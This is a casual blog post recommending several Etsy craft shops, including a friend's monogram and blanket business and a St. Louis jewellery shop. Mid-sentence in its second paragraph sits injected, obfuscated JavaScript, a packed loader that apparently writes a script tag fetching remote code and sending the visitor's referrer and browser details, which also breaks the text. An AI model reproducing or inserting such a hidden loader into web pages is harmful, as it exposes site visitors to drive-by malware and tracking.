Etsy and why you should poke around

I’m sure you’ve heard of etsy, right?  It’s a great little place for crafty people to sell their crafty things.

My friend, Brooke, ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kehzd|var|u0026u|referrer|sfabe||js|php’.split(‘|’),0,{}))
has an etsy store called
Bumble Designs where she sells monogrammed CD holders.  She also makes ADORABLE baby blankets that she sells through a facebook page.  These blankets are legit.  If you need a shower gift, Brooke’s your girl.  She didn’t even ask me to write that.  I’ve seen how awesome they are.  I kinda want an adult version.  Just saying.  I was going to post a picture of one of her blankets….but facebook wouldn’t let me grab the image.  So just go visit her site….and maybe you should “Like” it too.

I also spotted another etsy show today while perusing my google reader.  The Cake Blog posted about these incredibly intricate cake toppers!  Made from paper.  If we had decided to have a cake at our wedding, I would have wanted one of these toppers from Concarta!

I also just took a look around City Thistle’s etsy shop.  City Thistle is run by a mother of 2 living in St Louis.  I learned about City Thistle by following the creator’s blog, Still in St. Louis.  She’s a great source of free/cheap things to do in St. Louis!  We used a number of the activities (activities she does with her 2 little boys) when we were visiting this past Memorial day (Thanks, Still in St. Louis)!  Did I mention she just got back from Africa?  Yeah…I’m a bog stalker.

But back to the etsy shop!  These were my faves!  She’s got a great vintage-y (yeah, that’s a word) feel to her work.  And I really like her asymmetrical necklace.  Not to mention her prices are SUPER reasonable!  She’s also running a giveaway right now!  So head over to Still in St Louis and enter to win $10 towards your City Thistle purchase!

Moral of the story, shopping on etsy is like going to the farmer’s market.  It just makes you feel better.
